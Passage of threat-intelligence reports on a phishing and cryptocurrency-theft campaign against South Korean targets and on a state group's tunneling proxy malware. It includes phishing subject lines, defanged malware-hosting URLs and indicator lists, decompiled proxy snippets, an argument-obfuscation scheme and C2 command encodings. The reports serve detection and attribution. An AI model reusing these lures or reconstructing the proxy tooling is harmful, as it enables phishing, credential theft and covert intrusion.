B. Phishing Mail Subject

Phishing email subject lines used were primarily focused on email security – sending emails in the subject related to topics such as email hijackings, login attempts, security status, recovery emails, and password resetting, to convince victims to verify account information.

  • “[경고] 구글은 귀하의 비밀번호를 이용해 계정에 접근하려는 수상한 로그인 시도를 차단했습니다.”
  • “[경고] 누군가가 내 계정에 접근하려는 로그인 시도를 차단했습니다. 즉시 보호상태를 확인하세요.”
  • “[경고] 누군가가 내 비밀번호를 이용해 계정에 접근하려는 시도가 있었습니다”
  • “[중요] 누군가가 내 계정에 접근하려는 시도를 차단했습니다.”
  • “[중요] 즉시 보안상태를 확인하세요.”
  • “누군가가 내 이메일 주소를 복구 이메일로 추가했습니다”
  • “비밀번호 재설정 요청이 접수되었습니다.”
  • “연결된 Google 계정 관련 보안 경고”

The next part is translated into English.

  • “[WARNING] Google has blocked suspicious sign-in attempts to access your account using your password.”
  • “[WARNING] Someone has blocked sign-in attempts to access your account. Please check the protection immediately.”
  • “[WARNING] Someone tried to access your account using my password”
  • “[IMPORTANT] Someone has blocked an attempt to access your account.”
  • “[IMPORTANT] Check your security status immediately.”
  • “Someone added my email address as a recovery email”
  • “Your password reset request has been received.”
  • “Security warnings associated with linked Google Accounts”

C. Phishing Server Domain Address

The sub-domain name of the phishing page was also made to try to confuse the target user by using names similar to the target user’s email provider, such as using “qooqle” instead of “google”.

  • hxxp://acount-qooqle[.]pe[.]hu
  • hxxp://myacccounts-goggle[.]hol[.]es
  • hxxp://myaccounnts-goggle[.] esy[.]es
  • hxxp://qqoqle-centering[.]esy.es

Domains used as phishing servers were used not only for phishing but also for servers that distributed malware and servers that collected information from the victims.

countine[.]protector[.]mail@gmail[.]com

In January 2019, the malware distributed to the reporters downloaded files which obtained C2 information from Google Drive. The hacker’s Google Drive account is “countine[.]protector[.]mail@gmail[.]com”. This email account was also used for Gmail phishing attacks in September 2017 which asked for a password reset. This is an example of one of the Gmail accounts they create and use for both phishing and hosting Google Drive malware content.

Building a nest in “Agora”

“Agora” was an open meeting place in ancient Greek cities. In one of South Korea’s famous portal sites, the name “Agora” was used as an online space for articles and public discussion. A similar site called “Agora 2.0” was created to mimic this but had been neglected for a long time. The site has a domain called “ago2[.]co[.]kr” and has a Japanese IP address.

[Description of the site ‘Agora 2.0’]

SectorA05 hacked the “ago2[.]co[.]kr” server and used it as a C2 server. In January 2019, malware distributed to the reporters used “ago2[.]co[.]kr” as one of the C2 servers. As we continued investigating, we found that the server has been used as a malicious C2 server for at least 27 months. For example, the malware hash “2a25d42130837560fcff1e1e19264f05784bf9e9db6464afb15d7e26f7f4a433” used “ago2[.]co[.]kr” as a C2 server in “Operation Kitty Phishing” in November 4th, 2016.

Thus, they have built an illegitimate nest at “ago2[.]co[.]kr” and have used it as C2 for more than 27 months since at least 2016. In 2017 and 2018, malware from SectorA05 was still using that domain as a C2 server.

The Constant XOR Table

SectorA05 uploads encrypted malware to their C2 server, and the existing malware decrypts it with a XOR Table and then executes it. As we tracked usage of this XOR Table, we confirmed that malware using the same XOR table was used for the attack in June 2017. There are two kinds of XOR tables used as follows.

[January 7, 2019 XOR Decode function used in malware against reporters]

“Case A” refers to the group of malware samples used to attack the reporters, and this XOR Table was already in use in 2017.

Case HASH (SHA256) Timestamp (UTC+9) XOR Table
  f070768ba2d0091b66e2a15726e77165f64ec976e9930425009da79c7aa081ac 2017-06-02 10:09:19 051BC852ED4D1E4BD44030D6BF3187D056C1BE63947D08B00FE0F2E84BC8AB82
A 7603be6e20fdf1338f5de8660b866a7dcb87f1468d139930d9afcba7f3acabb4 2018-12-26 01:40:20
  8573d9008cca956a8f8b9a46ed7880b471435327e8e0ea42b2e143b410a99d7b 2017-07-15 11:23:06B20A82932F459278D44058ADBF3113FB56C1D749947D0FE00FE0ABC84BC8A02B
A fce7a02f4ca7bdab7fdb8168a2478e5897f6f31e3b53d36378033f6ba72ddc29 2018-12-10 06:55:36
A 48ba9d01f1fba5421e8bfbdd384a3849916bbd3e7930557f7d8f92f27cceb5fe2018-12-10 06:55:27
A 12ee511259f7f03e8472efa8baf3e250b64f8da65fe71212cedfdac887f503f42019-01-07 16:28:29
A 55e69e1337af0d93b5a3742d999bf805177c404e7e60e48f303509592ecd0e292019-01-07 16:41:09

Here, Kitty, Kitty!

After initial infection, SectorA05 performs reconnaissance first, such as taking the entire file list of the target user. If the target user has important information related to the Korean government or information related to cryptocurrency, they send additional malware and continuously monitor and collect information.

Additional malware we collected includes screen capture, keylogger, and Chrome Browser Password Stealer.

A. Screen Capture Module

This module periodically captures the victim screen, compresses it, and then sends it to a specific folder on the C2 server. An example of the file name to be transmitted is “[MAC Address]_imgscr_20190124_235450161”.

(SHA256 : 98e1cc1b96b420ece848a2b43a0c1ae0b5f9356a11227fca181ada95435d2c63)

[Code to capture screen]

B. Keylogger Module

This module periodically sends user’s keystrokes together with the window name of the program keystrokes were entered into to the hacker.

(SHA256 : 71841a1b5ee1b383a9282bf513723b7f1713a0e1ee501db38d64c2db9ba08ec4)

[Code to store the victim’s keyboard input value]
[Keylogging information sent to the C2 server]

C. Chrome Browser Password Stealer Module

This module steals information from the Chrome Browser and sees the value of the cookie and login data file in the “\AppData\Local\Google\Chrome\User Data\Default\”.

(SHA256 : 08ac5048e86d368eea55d55781659dc54070debc9d117ed0a5ca8edd499fe1f8)

[Code to steal cookies from Chrome Browser]

In some cases, by identifying the user name of the victim PC during the initial infection, the additional malware sent is compiled on a per victim basis. For example, the malware might make use of a fixed username and only steal information related to that specific user.

[Code to steal the login data of CEO user’s Chrome Browser]

Stealing Coins – a personal purpose or a nation state goal?

As we watched SectorA05’s theft activity, we realized that they divided their targets into two classes. The purpose of targeting the first target class was to steal information from South Korean government officials and the purpose of targeting the second target class was to steal cryptocurrency. SectorA05 is an organization that traditionally seeks to seize confidential information from South Korea and neighboring countries. In recent years, however, we found that they are spending a lot of time trying to steal cryptocurrency as well.

We wonder whether SectorA05 is expanding its official role from spying to also including stealing cryptocurrencies, or whether some of SectorA05 staff are deviating from their official interests.

In any case, they continued to actively steal cryptocurrency-related coins from both classes. Their goals are employees of cryptocurrency exchanges, normal users of cryptocurrency, and cryptocurrency-related developers.

They searched the victim’s directory for the cryptocurrency wallet and private key as follows:

[Navigate the file path where the cryptocurrency wallet and private key are stored]

Then, in order to take the control of the cryptocurrency wallet and corresponding private keys stored in the file path, additional malware (“59203b2253e5a53a146c583ac1ab8dcf78f8b9410dee30d8275f1d228975940e”) which compresses the files in the file path is distributed to the target users.

We see that they are responsible for monitoring and managing additional post-infection actions such as manually compiling and distributing additional malware to collect files.

[Malware that compresses files in a path with a wallet and a private key]

They also stole the Ethereum Keystore file issued by MyEtherWallet.

Thus, they are not only interested in confidential information of the government but also in stealing cryptocurrencies.

Kitty? Why? Who?

During the course of constantly tracking SectorA05, we found a management script that they use to manage victims. In the script file itself, they referred to their victims as “Kitty”. We decided to call their operation name “Operation Kitty Phishing”.

[Administrative scripts that an attacker manages victims]

They never stop working

We were surprised at their endless hacking activities as we track them down. They spread phishing e-mails to target users without rest, and their malware continued to spread. Even after distributing malware to reporters covering the Unification Ministry in early January 2019, they then distributed malware to potential users of cryptocurrency.

In addition, if the infected victim’s PCs were scanned and files related to cryptocurrency were found, malware would be compiled and distributed to individual users. The malware hash “f483d5051f39d1b08613479ccbc81423a15bfe5c5fb5a7792d4307a8af4e4586” is an example of a malware compiled and created solely for a single user. As the user name of the victim PC is exposed, the malware for stealing cryptocurrency is tailored for the individual user and distributed in real time.

[Steal a specific file from the victim’s PC username folder]

After they sent malware to the reporters, they continued to use the following URLs containing malware.

  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/AlyacMonitor64
  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/cookie.a
  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/2.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/AlyacMonitor64
  • hxxp://aiyac-updaite[.]hol.es/Est/down/AppContainer32.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/AppContainer64.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/BuildSteps32
  • hxxp://aiyac-updaite[.]hol.es/Est/down/BuildSteps64
  • hxxp://aiyac-updaite[.]hol.es/Est/down/Cookie.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/CoreWin32
  • hxxp://aiyac-updaite[.]hol.es/Est/down/CoreWin64
  • hxxp://aiyac-updaite[.]hol.es/Est/down/f.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/kakao.a
  • hxxp://aiyac-updaite[.]hol.es/Est/down/MSOfficeUpdate64
  • hxxp://aiyac-updaite[.]hol.es/Est/down/xpad64.exe

Conclusion

We have been constantly tracking “Operation Kitty Phishing” activity of SectorA05, which is targeting key government officials, cryptocurrency exchanges, and users in South Korea. We were amazed that their activities are older and last longer than we thought.

It was very difficult initially to judge whether the organization conducting email account phishing and the organization distributing malware were part of the same organization, but after tracking them over a long period, we can say with high confidence that they are both part of SectorA05 and are running both operations simultaneously.

While we write this article, they are continuing their malicious activities. We will still keep track of them. Therefore, if new activity is confirmed, our ThreatRecon Team will continue reporting on our findings.

Indicators of Compromise (IoCs)

Hashes (SHA-256)

028abdf89dc34088c2935e972a97f2d1249efe100f6282979d1771121c45101c 03cd82887b032ce2968bb739d13e1dd0ce3683df5bc1b87edc6872ddcd1dc625
08ac5048e86d368eea55d55781659dc54070debc9d117ed0a5ca8edd499fe1f8
098dd6d2556fa546132570795a9b901dbf93f306be1a9481b54b85d1f9203c9a
0ba05db51dfb118f82a38afaca2174a9b51ff59f20c90fd634b7298e019eacbf
12ee511259f7f03e8472efa8baf3e250b64f8da65fe71212cedfdac887f503f4
159b20e19c43ff6a8ba906d23596d5d138efa94aa38b611ee36a3f4da813278c
2a25d42130837560fcff1e1e19264f05784bf9e9db6464afb15d7e26f7f4a433
2b8a31c6a2a70ad4b5c593400731b418b91b0d55c48158a8a024420792268328
2c523736994639172ee7375a8e1392081f699ae0cc397015e1cad47ce44cfded
2c7a76c85a182bf4045afe2180d1d845ddbfca6044995f2273c77cbeb1e42f8a
38368ada36a1d98bbc55408e26a2219ec60e0e53c8d34d67fd010af574f84e5a
48ba9d01f1fba5421e8bfbdd384a3849916bbd3e7930557f7d8f92f27cceb5fe
493aadefcf45642c34b4d84a84a41da9ac173b52c3217f62b3e25ece6379bd94
55e69e1337af0d93b5a3742d999bf805177c404e7e60e48f303509592ecd0e29
575606c03d3775cd8880c76a3ef7c014cfcab08411a01f07fc3fcb60166be50b
58dc45c15d17c609f5237abf9a6d0a896a310bfd3406e72413b2929c781d6979
59203b2253e5a53a146c583ac1ab8dcf78f8b9410dee30d8275f1d228975940e
59283e60015923ab16f51dcb29350158f8f86e6d86dcaf8377468bb20bea3570
5bfa034f7555a38e64c078af71b4ff8c49511579fa826a87661940b7e9a6e333
5f05c1dffda819f082a1df8cc81faa77d3d69ba4b1d0a2092c2d5b66234f2d7e
5f2ac8672e19310bd532c47d209272bd75075696dea6ffcc47d1d37f18aff141
623458ffccbc4641a78914dcf9efdd78bbbd9103fc36d186c534a6d1aea4333d
71841a1b5ee1b383a9282bf513723b7f1713a0e1ee501db38d64c2db9ba08ec4
74d6b81565aeb95ee9df37ef7738d10baa9866261fb894d9ee9d67fc7c66badc
7603be6e20fdf1338f5de8660b866a7dcb87f1468d139930d9afcba7f3acabb4
828f828a4c7b098786a0b719c4cecbb1fe3c28aaf25f81fc939b9099097e4c1e
84edc9b828de54d4bd00959fabf583a1392cb4c3eab3498c52818c96dc554b90
8573d9008cca956a8f8b9a46ed7880b471435327e8e0ea42b2e143b410a99d7b
860b3a252226dea43cba5ea52f094c4c7c408f20e236f49bc975ff374d2450b8
8719218fc45939cf55e3e2d66d83769d916e736514941ffce3fffc515614ef4a
891c2b7a374063ea4e7f2693906b9c5e916646b827601727e9aeea0fb3e37f4a
8f06cfe7b7fd3cec439dfe975c7ef51859661dd120bb3dd8ae0a530a0b01782e
9481b2f26f6c8a8fa6dc509f925e6da95606a5fb190c3153646357b04464505f
95f1a84103f789d1ae749a3f8a384a29b39d6766e8a13d450b6553c39aba4fd7
9898a3669c457aa9ab56bd25d26d0a92605a4a0dccca2b2d8814f684bf2e9334
98a12699bd8f5c886f4b40ddee5a9abb9c130fac292a262c70ed92ee8c762cb0
98e1cc1b96b420ece848a2b43a0c1ae0b5f9356a11227fca181ada95435d2c63
b4bd3c50a5d7a7102a7e723f4b742f556a1ab93e3f5d4a36567a651109c4dfd9
bbfc7578f6d18c7d139e2a9b4e8dd74786c7b4bfec824f7ac1049b94e72ee846
c6c332ae1ccb580ac621d3cf667ce9c017be41f8ad04a94c0c0ea37c4789dd14
c87f4aeebd3f518ba30780cb9b8b55416dcdc5a38c3080d71d193428b0c1cc5a
d62bf83fb5a7b148f326908051b149b77663149d47426ce749e944f7abf5d304
d96f350c206b2d987c7b39daed7c81b7de4a5d1c73497c9971abb3114cc76e2d
d9746224143010adada9989bf6b1014bb10e8165615e1ef6b58fd429cd2aa20a
d992c84902992867a6dfc9caf4d80f211d4d7a7d3e9e043691768bb6d73b4987
e18ea5dcf830c1f7515be7610c34c445a699cd5d8a7aa8221fbe8cfdec25afd6
e7a314ac40b266415da32645f4bdeda7d8a448f0546fef49abc8958084f8ef38
ea1d4ce3f4a9a70670e67d69a36e5e65b314207d4d882a7e4bc26ddfbe6177b9
f070768ba2d0091b66e2a15726e77165f64ec976e9930425009da79c7aa081ac
f483d5051f39d1b08613479ccbc81423a15bfe5c5fb5a7792d4307a8af4e4586
f66e8851285f15a6af8f25178180ae9685c01198b9afd21fc24cc0fc4bc8744d
fce7a02f4ca7bdab7fdb8168a2478e5897f6f31e3b53d36378033f6ba72ddc29

Domains

acount-qooqle[.]pe[.]hu
ago2[.]co[.]kr
ahnniab[.]esy[.]es
aiyac-updaite[.]hol[.]es
daum-safety-team[.]esy[.]es
gyjmc[.]com
jejuseongahn[.]org
jundosase[.]cafe24[.]com
kuku675[.]site11[.]com
kuku79[.]herobo[.]com
mail-service[.]pe[.]hu
mail-support[.]esy[.]es
myacccounts-goggle[.]hol[.]es
myaccounnts-goggle[.]esy[.]es
my-homework[.]890m[.]com
nav-mail[.]hol[.]es
nid-mail[.]esy[.]es
nid-naver[.]hol[.]es
qqoqle-centering[.]esy[.]es
safe-naver-mail[.]pe[.]hu
suppcrt-seourity[.]esy[.]es

URLS

hxxp://ago2[.]co[.]kr/bbs/data/dir/F.php
hxxp://ago2[.]co[.]kr/bbs/data/dir/note.png
hxxp://ago2[.]co[.]kr/bbs/data/dir/svchow.dat
hxxp://ago2[.]co[.]kr/bbs/data/F.php
hxxp://ago2[.]co[.]kr/bbs/data/R.php
hxxp://ahnniab[.]esy[.]es/w/b.js
hxxp://aiyac-updaite[.]hol[.]es/Est/down/AlyacMonitor64
hxxp://aiyac-updaite[.]hol[.]es/Est/down/AppContainer32.a
hxxp://aiyac-updaite[.]hol[.]es/Est/down/AppContainer64.a
hxxp://aiyac-updaite[.]hol[.]es/Est/down/BuildSteps32
hxxp://aiyac-updaite[.]hol[.]es/Est/down/BuildSteps64
hxxp://aiyac-updaite[.]hol[.]es/Est/down/Cookie.a
hxxp://aiyac-updaite[.]hol[.]es/Est/down/CoreWin32
hxxp://aiyac-updaite[.]hol[.]es/Est/down/CoreWin64
hxxp://aiyac-updaite[.]hol[.]es/Est/down/f.a
hxxp://aiyac-updaite[.]hol[.]es/Est/down/kakao.a
hxxp://aiyac-updaite[.]hol[.]es/Est/down/MSOfficeUpdate64
hxxp://aiyac-updaite[.]hol[.]es/Est/down/xpad64.exe
hxxp://kuku675[.]site11[.]com/data/zero/log.php
hxxp://kuku79[.]herobo[.]com/data/pod/fund.pas
hxxp://my-homework[.]890m[.]com/bbs/data/board.php
hxxp://my-homework[.]890m[.]com/bbs/data/brave.ct
hxxp://my-homework[.]890m[.]com/bbs/data/tmp/D.php
hxxp://my-homework[.]890m[.]com/bbs/data/tmp/fileupload.php
hxxp://my-homework[.]890m[.]com/bbs/data/tmp/Ping.php
hxxp://my-homework[.]890m[.]com/gnu/board.php
hxxp://my-homework[.]890m[.]com/gnu/download/3.wsf
hxxp://my-homework[.]890m[.]com/gnu/ver
hxxp://nid-mail[.]esy[.]es/bbs/data/tmp/alpha.php
hxxp://nid-mail[.]esy[.]es/bbs/data/tmp/D.php
hxxp://nid-mail[.]esy[.]es/bbs/data/tmp/fileupload.php
hxxp://nid-mail[.]esy[.]es/bbs/data/tmp/Ping.php
hxxp://nid-mail[.]esy[.]es/bbs/data/tmp/tie.txt
hxxp://safe-naver-mail[.]pe[.]hu/Est/down/2.a
hxxp://safe-naver-mail[.]pe[.]hu/Est/down/AlyacMonitor64
hxxp://safe-naver-mail[.]pe[.]hu/Est/down/cookie.a
hxxp://suppcrt-seourity[.]esy[.]es/update/templates/indox.php
hxxp://www[.]gyjmc[.]com/board/data/cheditor/dir1/F.php
hxxp://www[.]jejuseongahn[.]org/hboard4/data/cheditor/badu/alpha.php
hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-sndXJESjllMkloOFU
hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-snT3RTMHJMZEk2Szg
hxxps://drive[.]google[.]com/uc?export=download&id=1MVR58_5SlXgDZ5arasQk9AnmihAb3KJ6
hxxps://drive[.]google[.]com/uc?export=download&id=1ocUSxHf_0jUjVMMbAQzwTJb0blUG0bYh
hxxps://drive[.]google[.]com/uc?export=download&id=1olByidca-8vkS-5jRKL9CirKPEP7waHm
hxxps://drive[.]google[.]com/uc?export=download&id=1RC5_9WWrfMMZKfu11OfIac5y2d5vRH1c
hxxps://drive[.]google[.]com/uc?export=download&id=1xCePTgAdwNIAN7MWOH_80aN_TZgn8uFv

Emails

acc[.]signnin[.]send@gmail[.]com
countine[.]protector[.]mail@gmail[.]com
n0[.]reaply[.]moster@gmail[.]com
no[.]raply[.]letservice@gmail[.]com
no[.]repiy[.]acc[.]notice@gmail[.]com
noreaply[.]securiity@gmail[.]com
noreply[.]centre[.]team@gmail[.]com
privacy[.]protect[.]team@gmail[.]com
protect[.]password[.]teams@gmail[.]com
protect[.]privacy[.]accounnt@gmail[.]com
protector[.]privacy[.]master@gmail[.]com

MITRE ATT&CK Techniques

The following is a MITRE ATT&CK matrix that applied the “Operation Kitty Phishing” of the SectorA05 group.

Initial Access

Spearphishing Attachment
Spearphishing Link
Valid Accounts

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
Graphical User Interface
PowerShell
Regsvr32
Rundll32
Scripting
Third-party Software
User Execution

Persistence

Hooking
Registry Run Keys / Startup Folder
Valid Accounts

Privilege Escalation

Hooking
Process Injection
Valid Accounts

Defense Evasion

Deobfuscate/Decode Files or Information
File Deletion
Obfuscated Files or Information
Process Injection
Regsvr32
Rundll32
Scripting
Valid Accounts
Web Service

Credential Access

Credential Dumping
Credentials in Files
Hooking
Input Capture
Private Keys

Discovery

Application Window Discovery
File and Directory Discovery
Process Discovery
Query Registry
System Information Discovery
System Owner/User Discovery

Lateral Movement

N/A

Collection

Automated Collection
Data from Local System
Data from Network Shared Drive
Data from Removable Media
Email Collection
Input Capture
Screen Capture

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Command and Control Channel
Scheduled Transfer

Command And Control

Commonly Used Port
Data Encoding
Multi-Stage Channels
Remote Access Tools
Standard Application Layer Protocol
Web Service

SectorA01 Custom Proxy Utility Tool Analysis

Overview

SectorA01 is one of the most infamous state sponsored threat actor groups globally and is unique in the sense that it is one of the only state sponsored groups with large interests in financial crime. So with the continued interest into SectorA01’s financial crime activities due to the recent potential misattribution of the Ryuk ransomware [1], we decided to perform an analysis into one of the tools – a proxy utility executable – used exclusively by SectorA01 that recently caught our attention again.

Interestingly, in the Hidden Cobra FASTCash report by the US-CERT [2] in October last year, there were two versions of a “Themida packed proxy service module” (i.e. x32 and x64 versions). Our analysis of those modules showed code reuse of critical functions with the sample we are analyzing in this post, leading us to think that those samples might be an evolution of this sample.

SectorA01 Proxy Utility

SectorA01 uses a variety of tools for different purposes, but one common custom tool used in the attacks targeting the Polish banks in 2016-2017 [3], a Taiwanese Bank in 2017 [4], and Vietnamese banks in 2018 [5] is one of their custom proxy utility executables.

The latest unique sample of this proxy utility we could find was on December 10th, 2018 from Canada. This leads us to one of a few possible theories that Canadian bank(s) may have been one of the many unreported or reported [6] targets during the time period of the attack on the Taiwanese bank based on the compilation timestamps.

As we can see from the FASTCash proxy samples below, at least one of their developers compiles the 64-bit sample immediately after compiling the 32-bit sample – behavior very normal for developers when compiling for multiple systems. The same thing can be seen for the two samples on 20 Feb 2017, and so in fact instead of calling them samples targeting a Taiwanese bank and potentially a Canadian bank, it may be more accurate to call it just one of the many pairs of 32-bit and 64-bit proxy samples produced by the group.

A proxy was also used against an unnamed Southeast Asian bank [7] which appears to be an older version of the proxy, and against an Indian bank [8] which appears to be a newer version of the proxy based our code analysis from samples in the US-CERT FASTCash report.

But despite the similarities, however, we are unable to definitively state that these samples were earlier (unnamed Southeast Asian bank) or later (FASTCash attack, such as against the Indian bank) versions of the proxy. After all, SectorA01 has more than one proxy tool in its arsenal, such as the proxy used together with their TYPEFRAME trojan [9] which has a separate code base.

DescriptionCompilation Timestamp
Attack on unnamed SEA bank (old version)17 Sep 2014 16:59:33
Attack on several Polish banks (variant)24 Aug 2015 10:21:52
Attack on Vietnamese banks (variant)2 May 2016 03:24:39
Attack on a Taiwanese Bank (32-bit) (variant)20 Feb 2017 11:09:30
Sample Discovered from Canada (64-bit) (sample analyzed)20 Feb 2017 11:09:41
FASTCash (32-bit) (new version)14 Aug 2017 17:14:04
FASTCash (64-bit) (new version)14 Aug 2017 17:14:12

Sample Background

This executable is a custom tunneling proxy utility tool in SectorA01’s toolkit. It can be used as either a tunneling proxy server to forward traffic to another destination, or as a tunneling proxy client which requests another infected tunneling proxy server to perform requests.

Besides being used as one of several ordinary proxy servers in a chain of servers to hide the source of attacks, against one example banking target from India in the FASTCash attacks, “a proxy server was created and transactions authorized by the fake or proxy server”. In this scenario, the proxy utility seems to be not used just as a secondary helper utility, but as the primary attack malware.

SectorA01 normally packs these samples with either the Themida or Enigma Protector, but in this blog post we will only be showing the analysis of the unpacked sample.

Process Arguments

This utility requires a single process argument in order for it to run. It attempts to decode the argument and only continues its execution path if the decoded argument match the format it is expecting.

The argument is delimited by the “|” symbol, and the utility decodes up to four tokens with each token being decoded individually. The first is required and used as the primary C2 server (malware acting as tunneling proxy server) or as the URL to be requested (malware acting as tunneling proxy client), the optional second token is used as the proxy target information, the optional third token is used as proxy server information, and the optional fourth token is an optional proxy username and password.

Each deobfuscated token is separated by a colon “:”, which is used as the deobfuscated process arguments delimiter.

int __stdcall WinMain_0(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){ //deobfuscate process arguments here deobfuscation_complete: if ( strlen(deobfuscated_c2_1) != 0 && strchr(deobfuscated_c2_1, “:”) ){ … } return 0; }

The decoding algorithm makes use of a rotating character in an eight character string “cEzQfoPw” and the loop index to ensure that every deobfuscated character at a different index comes from a different two obfuscated characters.

We recreated this deobfuscation algorithm and created an obfuscation algorithm, which allowed us to forge our own process arguments. An example of a process argument which uses all four tokens could be “!y$t$A$s!z$S$e$U$Q$Y$1$W$U!}$d|!y#z$A$s!z$S$o$1$5$t$A$e$U!x|!y#{!}$Z$C$R$o$1$P#}$8$a!y!y|!00X!B0]0D!8#z$2$R0d$0$b!w!20c!70B0d”.

Example TokenDecoded C2 InformationUsage
!y$t$A$s!z$S$e$U$Q$Y$1$W$U!}$d 192.168.1.1:443C2 Server (1-2 arguments)
Proxy Target (3-4 arguments)
!y#z$A$s!z$S$o$1$5$t$A$e$U!x172.16.1.1:443Proxy Target (2 arguments only)
!y#{!}$Z$C$R$o$1$P#}$8$a!y!y10.1.1.12:8080Proxy Server (3-4 arguments)
!00X!B0]0D!8#z$2$R0d$0$b!w!20c!70B0dsector%20a01:proxyProxy Authentication (4 arguments only)

Note that since the algorithm transforms every two encoded characters into one decoded character based on its character index, there are many possible two characters which will result in the same character, and finally countless different strings which would decode to a single string.

C2 Communication

The algorithm used for C2 communications is more straightforward – a combination of ADD/XOR repeatedly from each character in a hard coded 20 character byte array “{47 B0 62 0E 69 F3 22 8D 65 40 BF 39 24 A6 C3 BB 8E 68 EB B5}” is used for decoding, and the opposite XOR/SUB repeatedly from the reversed byte array is used for encoding. The algorithm restarts for each character without context, so it essentially ends up being a character substitution table.

There are eight commands to communicate with the C2 server, encoded by either the C2 server or the proxy client then decoded by the other side. These commands are in the Russian language but as other researchers have pointed out in the past, is simply a false flag.

In fact, in one of the analyzed malware used against an unnamed Southeast Asian bank, we see that what appears to be a much earlier versions of the proxy having seven numeric-only control codes while this sample has eight Russian language control codes, with the control codes in both samples having almost the same meaning.

OperationDescriptionHex Values over the Network
kliyent2podklyuchitMalware thread created notification (client)d1 14 23 b3 c7 b2 ac fe 70 0d 1c d1 14 b3 d7 f9 38 23 ac
NachaloClient has started (client)92 ab f9 38 ab 14 0d
ssylkaTunneling proxy server has started (client)c9 c9 b3 14 d1 ab
poluchitGet proxy target information (server)70 0d 14 d7 f9 38 23 ac
ustanavlivatSet proxy target information (server)d7 c9 ac ab b2 ab 2a 14 23 2a ab ac
pereslatStart a new tunneling proxy server session in new thread (server)70 c7 be c7 c9 14 ab ac
derzhatMaintain connection (server)1c c7 be b6 38 ab ac
vykhoditExit (server) / Client has exited (client)2a b3 d1 38 0d 1c 23 ac

Tunneling Proxy Server

When this utility acts as a tunneling proxy server, it directly uses Windows Sockets 2 (“WS2_32”) to achieve their rudimentary proxy.

signed __int64 __fastcall c2_ssylka(LPVOID lpThreadParameter){ SOCKET c2Socket = begin_c2(“ssylka”); … SOCKET targetProxySocket = retrieveProxySocket(); … start_tunnel_proxy_server(c2Socket, targetProxySocket); … } signed int __fastcall start_tunnel_proxy_server(SOCKET c2Socket, SOCKET targetProxySocket){ … numBytesReceived = recv(c2Socket, &dataToProxy, 0x2000, 0); … numBytesReceived = send(targetProxySocket, &dataToProxy, numBytesReceived, 0); … }

Tunneling Proxy Client

When this utility acts as a tunneling proxy client, it utilizes the more powerful embedded libcurl library (version 7.49.1 for this sample, but not always the case) to command other infected tunneling proxy servers.

__int64 __fastcall connect_to_proxy(__int64 fixedFunctionAddress, __int64 proxyTarget){ … curl_setopt(handle, CURLOPT_URL, proxyTarget); … curl_setopt(handle, CURLOPT_PROXY, fixedFunctionAddress + 16); //refers to deobfuscated proxy server information … curl_setopt(handle, CURLOPT_HTTPPROXYTUNNEL, 1); … if ( strlen((fixedFunctionAddress + 278)) != ) //if deobfuscated argument 4 is not empty curl_setopt(handle, CURLOPT_PROXYUSERPWD); //curl_setopt argument 3 = deobfuscated process argument 4, which is not detected by decompiler … } … }

The CURLOPT_HTTPPROXYTUNNEL code causes the client to starts by using HTTP CONNECT to the proxy server in order to request it to forward traffic to the proxy target.

>Internet Protocol Version 4, Src: x.x.x.x, Dst: 10.1.1.12 >Transmission Control Protocol, Src Port: xxxxx, Dst Port: 8080, Seq: 1, Ack: 1, Len: 59 >Hypertext Transfer Protocol >CONNECT 192.168.1.1:443 HTTP/1.1\r\n >[Expert Info (Chat/Sequence): CONNECT 192.168.1.1:443 HTTP/1.1\r\n] Request Method: CONNECT Request URI: 192.168.1.1:443 Request Version: HTTP/1.1 Host: 192.168.1.1:443\r\n

The FASTCash Connection

In October last year, the US-CERT reported about the “FASTCash” campaign by SectorA01, which was essentially an ATM cash-out scheme whereby SectorA01 remotely compromised bank payment switch applications to simultaneously physically withdraw from ATMs in many countries and steal millions of dollars.

Some of the artifacts used in the campaign included proxy modules, a RAT, and an installer application. When we performed a preliminary analysis and compared the FASTCash proxy module to the proxy module analyzed in this post, we found algorithmic similarities between the decoding/encoding functions, the process argument deobfuscation function, and the proxy function.

However, the FASTCash proxy module also had more functions in them with new capabilities as described briefly in the US-CERT FASTCash Malware Analysis Report [10]. Additionally, our own analysis showed that they have also updated the use of amateur-ish strings which were previously easily detectable from memory and obviously malicious, to now hiding or removing those custom strings. This is their normal behavior as it has been known that they are constantly modifying their own source code, and these similarities and developments leads us to think that the FASTCash proxy module might be an evolution of their previous proxy module.

Summary

Attribution is a complex and controversial topic, but regardless, correctly attributing a threat to a particular threat group is a far easier task than correctly attributing the threat to or being linked to a particular nation state. Given even a single piece of complex enough custom malware believed to be in possession by only a single group and context behind the attack, it is possible to have some degree of confidence of which group was behind the attack.

But even custom malware source code can get stolen, the executable itself repackaged, or the functions recreated. In a simpler scenario, false flags such as strings and metadata could also be placed.

Regarding the initial attribution of the Ryuk ransomware, however, while others have focused on the misattribution, our view is that even if it was correct it would simply have been a lucky guess. Basing attribution solely on the usage of a single privately purchasable malware is fundamentally flawed, and the simple truth is that no organization in the world would be able to track every piece of malware to know what is being sold in the dark and deep web anyway.

That is why in order to have a higher degree of confidence of who is behind an attack, the entirety of the threat’s tactics, techniques, and procedures (TTPs) need to be analyzed across multiple events using both trusted public and vetted private sources.

SectorA01 shows no signs of stopping their attacks against financial sectors worldwide and although they have been constantly modifying their code protectors, functions, and algorithms, there will be traces of similarities across different versions of their tools. Our Threat Recon Team will continue tracking such events and malware and report on our findings.

Unpacked Sample (SHA-256)

0d75d429c1cc3550b2961be84af777f8bed287a44a144b7a47988c601e1e9a27

Memory Dump Samples from US-CERT FASTCash Report (SHA-256)

9ddacbcd0700dc4b9babcd09ac1cebe23a0035099cb612e6c85ff4dffd087a26

1f2cd2bc23556fb84a51467fedb89cbde7a5883f49e3cfd75a241a6f08a42d6d

Packed Sample from Polish banks attack (SHA-256)

